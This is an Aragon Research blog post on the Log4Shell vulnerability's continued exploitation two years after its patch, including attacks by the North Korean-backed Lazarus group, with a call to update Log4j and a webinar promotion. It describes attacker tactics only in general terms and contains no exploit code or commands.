By: Craig Kennedy
Log4Shell Turns 2—And Is Still Being Exploited
It seems like Log4Shell is turning into an annual end-of-year topic describing the continuing saga of the exploits of a 2-year-old Apache vulnerability that was patched, yes, two years ago.
What is Log4Shell?
Log4Shell (CVE-2021-44228) is a severe remote code execution (RCE) vulnerability found in Apache Log4j, a widely used Java logging library. It was initially discovered in November 2021 and a patch was provided in early December 2021. This vulnerability was given a 10 out of 10 on the CVSS bug severity scale and was first reported by Aragon Research back in December 2021 in Apache Log4j – Are You at Risk?
One Year Later—Iranian-Backed Attack on US Government Agencies
Log4Shell was at top-of-mind a year later as the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint advisory in November 2022, following an attack that compromised US federal networks. This attack exploited the Log4j vulnerability in an unpatched VMWare Horizon server, allowing full access to government resources and was reported by Aragon Research back in November 2022 in The persistence of Log4j.
Two Years Later—Log4Shell is Once Again Back in the News
A North Korean-backed group named Lazarus is in the news for exploiting the Log4Shell vulnerability and introducing new malware written in D, a somewhat obscure offshoot of C++.
Standing Out from Other Hackers
Unlike most hacking groups that embrace proven attack toolkits to forensically blend in with other attack groups to avoid identification, Lazarus is writing its own code using languages not typically used by other hacking groups.
The logic by Lazarus is that nobody was looking for this attack vector as it’s never been used before. The downside for them is that now that it’s been identified, this attack vector can now be clearly used to identify Lazarus as the attack group.
This Vulnerability Was Patched 2 Years Ago, Right?
Two years after this vulnerability was identified, flagged with a severity of 10 out of 10, and a patch made available to all users, astonishingly over a third of applications are still running a vulnerable version of Log4j.
Lazarus Tactics
Lazarus used the Log4Shell vulnerability to access systems and establish a command and control (C2) server within an organization’s infrastructure to deploy its custom malware.
Lazarus has been exploiting the log4Shell vulnerability in unpatched VMWare Horizon servers publicly accessible on the internet. Once breached, the attackers carry out extensive reconnaissance, install remote access trojans that use the popular messaging app Telegram for command and control. They then deploy a custom proxy tool, to maintain persistent access, create a new local user account, and download credential dumping tools.
Drop Everything and Patch Your Systems
The necessity of patching this 2-year-old vulnerability should be paramount for all enterprises. Aragon Research strongly advises organizations to prioritize updating all instances of Log4j in their ecosystem to the latest version, or at least version 2.17.1. Patching is the only complete remedy for protecting against Log4Shell, and nothing short of a complete and detailed audit will confirm that you’re not at risk.
Bottom Line
The Lazarus exploit of the Log4Shell vulnerability highlights the dynamic nature of cyber threats especially against long known vulnerabilities. The Lazarus exploit serves as a stark reminder of the importance of identifying and patching vulnerabilities as soon as they’re found, in this case 2 years ago.
Get Ready for 2024 with Aragon’s 2024 Q1 Research Agenda!
Wednesday, January 17th, 2024 at 10 AM PT | 1 PM ET
Aragon Research’s 2024 Q1 Agenda
Aragon Research provides the strategic insights and advice you need to help your business navigate disruption and outperform your goals. Our research is designed to help you understand the technologies that will impact your business–using a number of trusted research methodologies that have been proven to help organizations like yours get to business outcomes faster.
On Wednesday, January 17th, 2024, join Aragon Research CEO and Lead Analyst, Jim Lundy for a complimentary webinar as they walk you through Aragon’s Q1 2024 research agenda.
This webinar will cover:
- Aragon’s coverage areas, analysts, and services
- Research offered by Aragon, including Visual Research
- The research agenda for Q1 2024
- Sneak peek at what’s coming in Q2 2024